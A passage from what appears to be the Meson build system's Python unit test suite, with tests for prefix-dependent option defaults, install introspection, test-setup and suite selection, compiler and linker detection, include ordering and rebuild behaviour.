'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
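# The log is assumed to contain one installed path per line, with '#'-prefixed
# comment lines (filtered out above), e.g. roughly:
#   /.../builddir/install/usr/share/sub1
#   /.../builddir/install/usr/share/sub1/data1.dat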
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
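# At this point the environment variable is roughly (illustrative value):
#   CC="python3 '.../compiler wrapper.py' gcc -DSOME_ARG "
# quote_arg() takes care of the space in the wrapper path, so the detection
# below should reconstruct the full wrapper command line.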
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
        # Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
